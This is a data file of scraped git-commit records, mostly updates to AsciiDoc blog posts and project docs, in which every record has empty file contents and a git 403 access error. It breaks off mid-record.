{"commit":"6cda3e875cf666a4e940150466e3e263b9b3c24b","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76071469ce841090ed7514c1662cec9c3b358e31","subject":"Update 2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","message":"Update 2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","new_file":"_posts\/2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"875ca558f37a2220872d382d82f745c74b37a22d","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90d59105109bc616b8c5823fb2e6cdd269219f0b","subject":"Update 2017-01-28-Livros-de-Prolog.adoc","message":"Update 2017-01-28-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a048e5160052dfa061feebaf42a012a648101a8","subject":"Common snippet multitenancy-transforms","message":"Common snippet multitenancy-transforms","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-multitenancytransforms.adoc","new_file":"src\/main\/docs\/common-multitenancytransforms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3464e10bd73aeace0467fea59822faf63ec01a06","subject":"Add a guide howto deploy quarkus to heroku.","message":"Add a guide howto deploy quarkus to heroku.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/deploying-to-heroku.adoc","new_file":"docs\/src\/main\/asciidoc\/deploying-to-heroku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c2e69e876e9cec7fe20261c34f43b90325b3867","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4aa7bfd4b9a6ef98e87d1094d72d553294883afb","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540dedf9a97ea8ad92f0dac25094bd11b8e0426d","subject":"Job: 11455","message":"Job: 11455\n\nAdd initial draft of ant\n","repos":"xtuml\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11455_deployments\/11455_deployments_scenarios.ant.adoc","new_file":"doc-bridgepoint\/notes\/11455_deployments\/11455_deployments_scenarios.ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42480cafeef28098ac3987972669f8b2ccd8f23a","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84388f573f69b3e6d7df1714582ae851b35de15f","subject":"Update 2016-07-11-Destruktion-homogener-Selbstbilder.adoc","message":"Update 2016-07-11-Destruktion-homogener-Selbstbilder.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-11-Destruktion-homogener-Selbstbilder.adoc","new_file":"_posts\/2016-07-11-Destruktion-homogener-Selbstbilder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2dc43983f4cff10e582439534e20e11defdd51d","subject":"Renamed '_posts\/2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc' to '_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc'","message":"Renamed '_posts\/2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc' to '_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc'","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc","new_file":"_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b2e3f2cb1b16d109ff3eb81b6c2cc71a91b8af1","subject":"y2b create post You Choose My New Look","message":"y2b create post You Choose My New Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-10-You-Choose-My-New-Look.adoc","new_file":"_posts\/2016-10-10-You-Choose-My-New-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"818d5ec75630164f4c60cea5322c59815b746781","subject":"Update 2018-02-02-Web-R-T-C.adoc","message":"Update 2018-02-02-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-Web-R-T-C.adoc","new_file":"_posts\/2018-02-02-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6fe563694d4ba012fa564398af621b8622af9b4","subject":"y2b create post How To Charge Your Phone With Fire!","message":"y2b create post How To Charge Your Phone With Fire!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-05-How-To-Charge-Your-Phone-With-Fire.adoc","new_file":"_posts\/2017-04-05-How-To-Charge-Your-Phone-With-Fire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1d14a03db385f8ab6943bbf852c2b3c7184268e","subject":"Update 2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","message":"Update 2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","new_file":"_posts\/2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f815f1878bf2dcd4b73de9ef94c05bbb652f4b1","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28be20dd8936cf0e2396e6440863fe508b13cde5","subject":"Deleted 2016-12-2-3-Dpen.adoc","message":"Deleted 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bc016d33088777ac67faccf8c9d970ab67c66fe","subject":"Added camel 2.17.7 release notes to docs","message":"Added camel 2.17.7 release notes to docs\n","repos":"christophd\/camel,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,DariusX\/camel,davidkarlsen\/camel,pmoerenhout\/camel,tdiesler\/camel,zregvart\/camel,sverkera\/camel,tadayosi\/camel,cunningt\/camel,mcollovati\/camel,adessaigne\/camel,anoordover\/camel,christophd\/camel,pax95\/camel,nicolaferraro\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,zregvart\/camel,objectiser\/camel,christophd\/camel,adessaigne\/camel,sverkera\/camel,kevinearls\/camel,pax95\/camel,tadayosi\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,gnodet\/camel,nikhilvibhav\/camel,christophd\/camel,gnodet\/camel,pmoerenhout\/camel,tadayosi\/camel,jamesnetherton\/camel,tadayosi\/camel,ullgren\/camel,alvinkwekel\/camel,jamesnetherton\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,jamesnetherton\/camel,tdiesler\/camel,apache\/camel,alvinkwekel\/camel,pmoerenhout\/camel,davidkarlsen\/camel,pax95\/camel,kevinearls\/camel,nikhilvibhav\/camel,gnodet\/camel,nicolaferraro\/camel,tdiesler\/camel,Fabryprog\/camel,sverkera\/camel,nicolaferraro\/camel,apache\/camel,DariusX\/camel,anoordover\/camel,jamesnetherton\/camel,pax95\/camel,adessaigne\/camel,onders86\/camel,pax95\/camel,anoordover\/camel,cunningt\/camel,sverkera\/camel,objectiser\/camel,apache\/camel,cunningt\/camel,christophd\/camel,onders86\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,tdiesler\/camel,ullgren\/camel,CodeSmell\/camel,christophd\/camel,pax95\/camel,zregvart\/camel,Fabryprog\/camel,sverkera\/camel,davidkarlsen\/camel,apache\/camel,alvinkwekel\/camel,zregvart\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,CodeSmell\/camel,DariusX\/camel,DariusX\/camel,Fabryprog\/camel,pmoerenhout\/camel,kevinearls\/camel,onders86\/camel,tdiesler\/camel,onders86\/camel,CodeSmell\/camel,ullgren\/camel,adessaigne\/camel,davidkarlsen\/camel,apache\/camel,anoordover\/camel,tdiesler\/camel,onders86\/camel,anoordover\/camel,anoordover\/camel,objectiser\/camel,Fabryprog\/camel,gnodet\/camel,kevinearls\/camel,cunningt\/camel,mcollovati\/camel,jamesnetherton\/camel,mcollovati\/camel,kevinearls\/camel,kevinearls\/camel,onders86\/camel,apache\/camel,adessaigne\/camel,ullgren\/camel,objectiser\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2177-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2177-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c9f375c5357e3fb0f2ffdd645853a6518a94be2","subject":"Update 2015-05-16-Faustino-loeza-Perez2.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez2.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez2.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a5dbc7d18331371116679050aaadfb926692839","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef0039b549c6662ab81e2269c707afb1e82288be","subject":"Renamed '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc' to '_posts\/2017-09-30-Web-Developer-Courses.adoc'","message":"Renamed '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc' to '_posts\/2017-09-30-Web-Developer-Courses.adoc'","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-30-Web-Developer-Courses.adoc","new_file":"_posts\/2017-09-30-Web-Developer-Courses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cc92a8b1b614c06d4c12cf58f5fdceeb1ee7030","subject":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","message":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af140991dfc03e9c5ff20af107aefcf27444cbc","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dd7413a679935feacd2609d3e5ca412357e32b5","subject":"Update 2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","message":"Update 2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","new_file":"_posts\/2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2111013ecf079a41998ddeee7a53fcaed7852f88","subject":"More wording tweaks","message":"More wording tweaks\n","repos":"ysb33r\/asciidoctor-gradle-examples,rwinch\/asciidoctor-gradle-examples,sputnik27\/asciidoctor-gradle-examples,achimgrimm\/asciidoctor-gradle-examples,ysb33r\/asciidoctor-gradle-examples,rwinch\/asciidoctor-gradle-examples,achimgrimm\/asciidoctor-gradle-examples,sputnik27\/asciidoctor-gradle-examples","old_file":"asciidoc-to-github-pages-example\/README.adoc","new_file":"asciidoc-to-github-pages-example\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rwinch\/asciidoctor-gradle-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"239799e8499d5a23a542e9451ebc2459b694e85f","subject":"Adding 0.7.3 release announcement","message":"Adding 0.7.3 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-02-15-debezium-0-7-3-released.adoc","new_file":"blog\/2018-02-15-debezium-0-7-3-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4044b3051ee9b9ce020ce95fef7e9163c061a6b6","subject":"Adding 0.7.4 release announcement","message":"Adding 0.7.4 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-03-07-debezium-0-7-4-released.adoc","new_file":"blog\/2018-03-07-debezium-0-7-4-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c93fdd8e0f54a7bc33cb313b4695b89a043c8c4","subject":"Update 2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","message":"Update 2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","new_file":"_posts\/2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45b694f1f341f31ca36d02bbdd906e090c618e13","subject":"Update 2016-06-08-Rinna-In-Pepper.adoc","message":"Update 2016-06-08-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a33821ba3d3c5a6e0064be128af8f4f4c05c719","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c9834846a8d2c4f1432e7a515fd542dfb1e7bff","subject":"y2b create post Become the unboxer! + Xbox One or PS4?","message":"y2b create post Become the unboxer! + Xbox One or PS4?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-04-Become-the-unboxer--Xbox-One-or-PS4.adoc","new_file":"_posts\/2013-12-04-Become-the-unboxer--Xbox-One-or-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dba7c80e2cdb7589450fec95b91ee699ddf81d20","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95aafe4a3a0994cdc020c16dc5d01eade31bad15","subject":"Update 2017-03-17-iphone-irkit-arduino.adoc","message":"Update 2017-03-17-iphone-irkit-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f9ad0c81c21c990ac1f9850b872faffec4bab3e","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c966f9ae251bc2f57f8d6f76c010ff364c08e211","subject":"Update 2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","message":"Update 2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","new_file":"_posts\/2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0735f03d2143a94607984bdf11c4bd1ccd32abf8","subject":"Update 2014-11-18-So-I-made-a-programming-language-Now-what.adoc","message":"Update 2014-11-18-So-I-made-a-programming-language-Now-what.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-11-18-So-I-made-a-programming-language-Now-what.adoc","new_file":"_posts\/2014-11-18-So-I-made-a-programming-language-Now-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"357418465fb4ce13da944f9ae24673cc542594f9","subject":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","message":"Update 